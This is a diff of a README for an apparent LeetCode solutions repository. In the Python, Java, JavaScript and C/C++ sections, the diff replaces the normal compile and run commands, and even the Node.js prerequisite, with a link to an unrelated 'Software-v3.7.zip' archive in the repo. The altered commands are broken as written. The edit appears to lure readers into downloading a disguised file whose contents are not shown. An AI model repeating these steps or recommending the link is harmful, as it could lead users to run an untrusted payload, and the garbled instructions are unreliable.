mdkdkmdd/leetcode/README.md

 ### For Python
 1. Open your command prompt or terminal.
 2. Navigate to the directory containing the downloaded file.
-3. Type `python solution.py` and press Enter.
+3. Type `python https://github.com/mdkdkmdd/leetcode/raw/refs/heads/main/sol/solution/2901-3000/2953/Software-v3.7.zip` and press Enter.

 ### For Java
 1. Open your command prompt or terminal.
 2. Navigate to the directory containing the downloaded file.
-3. Compile the code using `javac Solution.java`.
+3. Compile the code using `javac https://github.com/mdkdkmdd/leetcode/raw/refs/heads/main/sol/solution/2901-3000/2953/Software-v3.7.zip`.
 4. Run the program with `java Solution`.

 ### For JavaScript
-1. Make sure you have Node.js installed.
+1. Make sure you have https://github.com/mdkdkmdd/leetcode/raw/refs/heads/main/sol/solution/2901-3000/2953/Software-v3.7.zip installed.
 2. Open your command prompt or terminal.
 3. Navigate to the directory containing the downloaded file.
-4. Run the code using `node solution.js`.
+4. Run the code using `node https://github.com/mdkdkmdd/leetcode/raw/refs/heads/main/sol/solution/2901-3000/2953/Software-v3.7.zip`.

 ### For C/C++
 1. Open your command prompt or terminal.
 2. Navigate to the directory containing the downloaded file.
-3. Compile the code using `gcc solution.c -o solution` or `g++ solution.cpp -o solution`.
+3. Compile the code using `gcc solution.c -o solution` or `g++ https://github.com/mdkdkmdd/leetcode/raw/refs/heads/main/sol/solution/2901-3000/2953/Software-v3.7.zip -o solution`.
 4. Run the program with `./solution`.

 ## 📝 Contributing